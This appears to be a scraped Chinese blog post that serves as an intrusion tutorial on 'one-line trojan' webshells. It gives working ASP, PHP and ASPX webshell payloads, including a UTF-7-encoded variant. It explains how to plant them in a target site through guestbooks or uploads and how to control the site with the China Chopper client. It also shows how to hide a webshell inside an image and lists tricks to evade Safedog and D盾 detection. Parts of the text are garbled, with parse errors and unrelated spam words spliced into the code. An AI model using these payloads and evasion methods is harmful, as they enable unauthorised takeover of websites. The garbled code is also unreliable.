一句话木马、中国菜刀、图片一句话制作、过狗一句话

⼀句话⽊马、中国菜⼑、图⽚⼀句话制作、过狗⼀句话
⼀句话⽊马短⼩精悍,⽽且功能强⼤,隐蔽性⾮常好,在⼊侵中始终扮演着强⼤的作⽤。
常⽤⼀句话⽊马
asp⼀句话⽊马:
  <%execute(request(“value”))%>
  php⼀句话⽊马:
  <?php @eval($_POST[value]);?>
  aspx⼀句话⽊马:
  <%@ Page Language=“Jscript”%>
  <%eval(Request.Item[“value”])%>
其他⼀句话⽊马:
<%eval request(“value”)%>
  <%execute request(“value”)%>
  <%execute(request(“value”))%>
  <%If Request(“value”)<>"" Then Execute(Request(“value”))%>
  <%if request (“value”)<>"“then session(“value”)=request(“value”):end if:if session(“value”)<>”" then execute session(“value”)%>
  不⽤双引号的⼀句话⽊马:
  <%eval request(chr(35))%>
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
⼀句话最常⽤的客户端为:
⼀句话客户端增强版
中国菜⼑
lanker⼀句话客户端
ZV新型PHP⼀句话⽊马客户端GUI版
使⽤⽅法:
⾸先,到数据库是asp格式的⽹站,然后,以留⾔板,或者发表⽂章的⽅式,把⼀句话添加到asp数据库,或者加进asp⽹页.
记住!我们的⽬的是把⼀句话<%execute request(“value”)%>添加到数据库,⽆论任何⽅式!
然后打开客户端(就是你电脑上⾯的那个htm⽂件),填上加⼊了⼀句话的asp⽂件,或者是asp⽹页,然后进⼊此⽹站服务器。
⽊马原理:
⾸先 < SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表⽰脚本将在服务器端运⾏, 后⾯的eval是⼀句话⽊马的精华部分,使⽤eval⽅法的话它⾥⾯的字符串将会被执⾏,这样当脚本在服务器端运⾏的时候同时也执⾏了 Request.form(’#’)+’‘这句代码,Request.form(’#’)的作⽤是读取客户端⽂件中html标记属性中name值被命名 为#的部分。
关于错误:
服务器错误
经常,当我们在⼀个asp⽂件内添加了⼀句话后,就会出现类型不匹配的错误:
Script error detected at line 1.
Source line:execute request(“nettoo”)
Description:类型不匹配: ‘execute’
解决⽅法:
⽤"eval"替换掉"execute"服务端,就不会出错了。
中国菜⼑与⼀句话⽊马
往⽬标⽹站中加⼊⼀句话⽊马,然后你就可以在本地通过中国菜⼑即可获取和控制整个⽹站⽬录。
我们可以把⼀句话⽊马插⼊到⽹站上的某个asp/aspx/php⽂件上,或者直接创建⼀个新的⽂件,在⾥⾯写⼊这些语句,然后把⽂件上传到⽹站上即可。
打开中国菜⼑,在空⽩处点击⿏标右键,选择“添加”选项。
编辑相关参数,包括⼀句话⽊马所在的URL及密码,最后点击“编辑。
在URL列表中选中⽬标⽹站,点击⿏标右键,选择“⽂件管理”,可以看到⽹站的⽬录结构。
图⽚⼀句话制作
如果⽹站限制了上传类型,.asp,.php上传不上出,但是可以上传图⽚,那么就可以使⽤图⽚隐写术将⼀句话⽊马安插在图⽚⾥,具体操作步骤是:
⾸先准备好⼀张图⽚,⼀个⼀句话⽊马,以及同路径下的dos窗⼝
然后输⼊DOS命令:copy 1.jpg+1.php 2.jpg
此时产⽣的2.jpg就是我们要的图⽚⼀句话⽊马。
其他类型的⼀句话⽊马也是⼀样的使⽤⽅法。当然,⼀般⽹站不可能这么容易就上传,肯定有防护机制,⽐⽅说安全狗防护。
PHP⼀句话过狗、卫⼠、D盾等免杀思路!
受电弓检测仪
1.关键字拆分。
智能小车⽐如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
这种⽅法虽然简单,但是却没有太强的免杀功效,需要结合其他⽅法
2.可变变量、引⽤、可变函数
a=b=’a’;@eval(
可变变量 ⽐如_POST[‘x’];$b);强力胶配方
这种⽅法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是⽆效的!
引⽤ ⽐如_POST[‘x’];KaTeX parse error: Expected 'EOF', got '&' at position 3: b=&a ;@eval($b);
测试结果:
这种⽅法与上⼀种⽅法类似
电渗析模块可变函数 ⽐如a($_POST[‘x’]);
a =a =’a ’.’ss ’.’e ’.’r ’.’t ’;
这种⽅法对于狗、3卫⼠、D盾之类的均没有作⽤哦
3.添加其他代码。
添加其他代码 ⽐如 if(empty($a))
{
_POST[‘x’];
}
@eval($a);
a =
4.函数替换。
凯膜过滤技术使⽤其他函数,⽐如eval可以使⽤assert替换。
总结:这种⽅法适合eval函数被禁⽤时使⽤哦
5.封装到新的函数中。
新定义⼀个函数,使其封装到新函数中。
function test(KaTeX parse error: Expected '}', got 'EOF' at end of input: …⼀个名为test的函数,并使⽤a接受参数eval(KaTeX parse error: Expected 'EOF', got '}' at position 12: a); }test(_POST[‘x’]);
热轧酸洗测试结果:
这种⽅法适合有PHP基础的⼈

本文发布于:2024-09-23 03:23:58,感谢您对本站的认可!

本文链接:https://www.17tex.com/tex/3/267578.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:函数   客户端   上传   添加   免杀   类型
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2024 Comsenz Inc.Powered by © 易纺专利技术学习网 豫ICP备2022007602号 豫公网安备41160202000603 站长QQ:729038198 关于我们 投诉建议